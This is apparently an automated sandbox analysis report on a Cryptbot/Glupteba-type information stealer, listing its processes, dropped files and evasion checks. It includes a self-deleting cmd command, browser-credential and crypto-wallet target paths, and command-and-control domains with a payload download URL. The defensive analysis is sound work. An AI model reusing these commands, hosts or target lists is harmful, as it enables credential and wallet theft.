Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0A58C SetUnhandledExceptionFilter, 22_2_05A0A58C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0D58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_05A0D58E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0A888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_05A0A888
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0A3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_05A0A3F9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040A33C SetUnhandledExceptionFilter, 25_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DA58C SetUnhandledExceptionFilter, 25_2_059DA58C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DD58E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_059DD58E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DA888 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_059DA888
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DA3F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_059DA3F9

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe' Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040285A AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 18_2_0040285A
Source: vpn.exe, 00000012.00000003.387443345.0000000003C68000.00000004.00000001.sdmp, Notti.eps.18.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: SmartClock.exe, 00000016.00000002.497106175.00000000045D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A45B cpuid 16_2_0040A45B
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, 18_2_004025A3
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_AllCookies_list.txt VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Cookies\google_chrome_new.txt VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Information.txt VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Screen_Desktop.jpeg VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies\google_chrome_new.txt VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies.txt VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\screenshot.jpg VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Queries volume information: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\system_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A0BF0 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_004A0BF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00418C20 CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,ExpandEnvironmentStringsW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,RegOpenKeyExW, 0_2_00418C20
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004B465F _free,_free,_free,GetTimeZoneInformation,_free, 0_2_004B465F
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 13_2_00406831

Stealing of Sensitive Information:

Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Yara detected Glupteba
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe String found in binary or memory: \_Files\_Wallet\Electrum
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe String found in binary or memory: \_Files\_Wallet\ElectronCash
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp String found in binary or memory: *.*%USERPROFILE%\Desktop\*.txt%USERPROFILE%wallet.datUTC--2*%LocalAppData%\Coinomi%AppData%\waves-exchange%AppData%\Ledger Live\sqlite\_Files\_Files\Coinomi\_Files\_Files\waves_exchange\_Files\_Files\Ledger_Live_sqlite\_Files\_Wallet\Electrum\_Files\_Wallet\ElectronCash\_Files\_Wallet\Electrum-btcp%USERPROFILE%\AppData\Roaming\Jaxx%USERPROFILE%\AppData\Roaming\Exodus%USERPROFILE%\AppData\Roaming\MultiBitHD%USERPROFILE%\Documents\Monero%USERPROFILE%\AppData\Roaming\Exodus Eden%USERPROFILE%\AppData\Roaming\Electrum\wallets%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets%USERPROFILE%\AppData\Roaming\ElectronCash\wallets%USERPROFILE%\AppData\Roaming\com.liberty.jaxx%APPDATA%\Atomic%APPDATA%\waves-client\_Files\_Wallet\Jaxx\_Files\_Wallet\Exodus\_Files\_Wallet\MultiBitHD\_Files\_Wallet\Monero\_Files\_Wallet\Exodus Eden\_Files\_Wallet\Electrum\wallets\_Files\_Wallet\Electrum-btcp\wallets\_Files\_Wallet\ElectronCash\wallets\_Files\_Wallet\com.liberty.jaxx\_Files\_Wallet\Atomic\_Files\_Wallet\waves-client\_Files\_Information.txt\files_\system_info.txt%wS [ %wS ]
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe String found in binary or memory: %USERPROFILE%\AppData\Roaming\Jaxx
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe String found in binary or memory: %USERPROFILE%\AppData\Roaming\Exodus
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.383574469.0000000005B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Yara detected Glupteba
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004098C0 AddClipboardFormatListener,SetEvent, 16_2_004098C0
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow, 16_2_00409436
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004095A8 RemoveClipboardFormatListener, 16_2_004095A8
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004097BA AddClipboardFormatListener, 16_2_004097BA
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59B10 AddClipboardFormatListener,SetEvent, 16_2_03F59B10
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59A0A AddClipboardFormatListener, 16_2_03F59A0A
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F597F8 RemoveClipboardFormatListener, 16_2_03F597F8
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59686 IsWindow,RemoveClipboardFormatListener,IsWindow, 16_2_03F59686
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004098C0 AddClipboardFormatListener,SetEvent, 22_2_004098C0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow, 22_2_00409436
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004095A8 RemoveClipboardFormatListener, 22_2_004095A8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004097BA AddClipboardFormatListener, 22_2_004097BA
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A097F8 RemoveClipboardFormatListener, 22_2_05A097F8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09686 IsWindow,RemoveClipboardFormatListener,IsWindow, 22_2_05A09686
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09B10 AddClipboardFormatListener,SetEvent, 22_2_05A09B10
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09A0A AddClipboardFormatListener, 22_2_05A09A0A
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004098C0 AddClipboardFormatListener,SetEvent, 25_2_004098C0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow, 25_2_00409436
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004095A8 RemoveClipboardFormatListener, 25_2_004095A8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004097BA AddClipboardFormatListener, 25_2_004097BA
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D97F8 RemoveClipboardFormatListener, 25_2_059D97F8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9686 IsWindow,RemoveClipboardFormatListener,IsWindow, 25_2_059D9686
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9B10 AddClipboardFormatListener,SetEvent, 25_2_059D9B10
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9A0A AddClipboardFormatListener, 25_2_059D9A0A
Behavior Graph (graphic omitted): Behavior Graph ID: 385467, Sample: SecuriteInfo.com.W32.AIDete..., Startdate: 12/04/2021, Architecture: WINDOWS, Score: 100
Process tree recoverable from the graph: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe starts Murano.exe and cmd.exe; Murano.exe drops and starts vpn.exe and 4.exe (and drops UAC.dll); vpn.exe starts several makecab.exe instances (each with a conhost.exe); 4.exe drops and starts SmartClock.exe; cmd.exe starts conhost.exe and timeout.exe. SmartClock.exe is also started twice from the root.
Dropped files shown in the graph: C:\Users\user\AppData\Local\Temp\Murano.exe (PE32), C:\Users\user\AppData\Local\...\lv[1].exe (PE32), C:\Users\user\AppData\Local\Temp\...\vpn.exe (PE32), C:\Users\user\AppData\Local\Temp\...\4.exe (PE32), C:\Users\user\AppData\Local\Temp\...\UAC.dll (PE32), C:\Users\user\AppData\...\SmartClock.exe (PE32)
Network contacts shown in the graph: awumad01.top (8.209.66.205, ports 49719, 49720, 80), mardeq01.top (8.209.64.179, ports 49718, 80), aufsvg12.top (8.211.1.15, ports 49717, 80), all CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, Singapore; unresolved lookup EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZ

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
8.209.66.205 | awumad01.top | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
8.211.1.15 | aufsvg12.top | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
8.209.64.179 | mardeq01.top | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false

Contacted Domains

Name | IP | Active
mardeq01.top | 8.209.64.179 | true
awumad01.top | 8.209.66.205 | true
aufsvg12.top | 8.211.1.15 | true
EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZ | unknown | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://aufsvg12.top/index.php | false | Avira URL Cloud: safe | unknown
http://mardeq01.top/index.php | false | Avira URL Cloud: safe | unknown
http://awumad01.top/downfiles/lv.exe | true | Avira URL Cloud: safe | unknown
http://awumad01.top/download.php?file=lv.exe | true | Avira URL Cloud: safe | unknown